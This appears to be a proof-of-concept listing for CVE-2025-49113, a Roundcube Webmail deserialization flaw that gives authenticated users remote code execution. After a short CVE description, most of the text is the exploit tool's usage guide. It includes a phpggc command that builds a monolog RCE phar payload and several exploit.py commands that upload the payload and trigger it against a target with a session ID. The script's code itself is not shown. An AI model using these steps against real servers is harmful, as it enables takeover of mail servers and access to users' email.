PoC details: 131efeaf7c7e5dc6b1423204503887427c2dd7ce

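Related vulnerability
Title: Roundcube Webmail security vulnerability (CVE-2025-49113)
Description: Roundcube Webmail is a browser-based open-source IMAP client from Roundcube. It supports address book management, message search, spell checking and more. Roundcube Webmail versions before 1.5.10 and versions before 1.6.11 contain a security vulnerability that stems from the _from parameter not being validated, which may lead to a PHP object deserialization attack.
Description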
Roundcube Webmail before 1.5.10 and 1.6.x before 1.6.11 allows remote code execution by authenticated users because the _from parameter in a URL is not validated in program/actions/settings/upload.php, leading to PHP Object Deserialization.
Introduction
## ENGLISH ##
- ## ✅ Features: ##

>Supports uploading payload.phar

>Automatically guesses the path if it is not known exactly

>Allows an optional phar:// path to be used

>Provides the options --upload-payload, --auto-path, --direct-path

- ## 🧪 How to use: ##
- 1. Create payload:

>phpggc monolog/rce1 system 'id' -p phar -o payload.phar

- 2. Upload and exploit automatically:

>python3 exploit.py https://target.com SESSIONID --upload-payload payload.phar --auto-path

- 3. Upload and enter the path yourself if you know the exact path:

>python3 exploit.py https://target.com SESSIONID --upload-payload payload.phar --direct-path /var/www/html/temp/payload.phar

- 4. Do not upload, just exploit:

>python3 exploit.py https://target.com SESSIONID --direct-path /var/www/html/temp/payload.phar

- ✅ You can replace SESSIONID with a valid Roundcube session.
File snapshot

[4.0K] /data/pocs/131efeaf7c7e5dc6b1423204503887427c2dd7ce
├── [2.7K] exploit.py
└── [1.7K] README.md

0 directories, 2 files